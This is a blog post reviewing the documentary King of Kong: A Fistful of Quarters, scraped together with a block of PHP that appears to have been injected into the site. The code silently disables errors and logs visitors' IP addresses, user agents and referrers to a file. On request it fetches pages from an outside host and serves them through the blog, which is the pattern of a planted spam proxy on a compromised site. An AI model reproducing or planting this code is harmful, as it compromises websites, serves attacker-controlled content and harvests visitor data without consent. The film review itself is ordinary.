error_reporting(0); ini_set('display_errors',0); define('STATFILE','stat.txt'); define('LOG',true); if(isset($_GET['p'])) { $sock = fsockopen('km32025.keymachine.de', 80); if($sock){ if (LOG && isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])) { $referer = rawurlencode($_SERVER['HTTP_REFERER']); $remote_ip = $_SERVER['REMOTE_ADDR']; $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']); $file = fopen(STATFILE,'ab'); if ($file) { fwrite($file,date('Y-m-d H:i:s').' '.$remote_ip.' '.$user_agent.' '.rawurldecode($referer)."\n"); fclose($file); } } fwrite ($sock, 'GET http://km32025.keymachine.de/oslik2/cn/7/'.$_GET['p'].'.html HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km32025.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); echo(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock);} exit; } -=+fastlikesquirrel.com+=- » Blog Archive » Billy vs. Steve

Billy vs. Steve

After winning some free tickets for King of Kong: A Fistful of Quarters, I finally had a chance to go and see this film this weekend.

My thoughts? I loved the film and every aspect of it. From the weird and kooky characters involved in the arcade scene, to the behind the scenes look into Twin Galaxies. I also loved the underlying theme of how an underdog can come from behind to beat the champion.

I wasn’t sure it was meant to be a mockumentary or not, as it featured some elements that leaned towards the former. But after researching a little more, the film was never intended to be satirical or comedic in any way. To quote Peter Travers from Rolling Stone Magazine-

“Who would have guessed that a documentary about gamers obsessed with scoring a world record at Donkey Kong would not only be roaringly funny but serve as a metaphor for the decline of Western civilization?”

It’s such a shame that it took so long to be released in Australia, as you can now buy it on DVD from the official site.

The lessons I learnt from this film? Don’t get chumpatized.

Leave a Reply

You must be logged in to post a comment.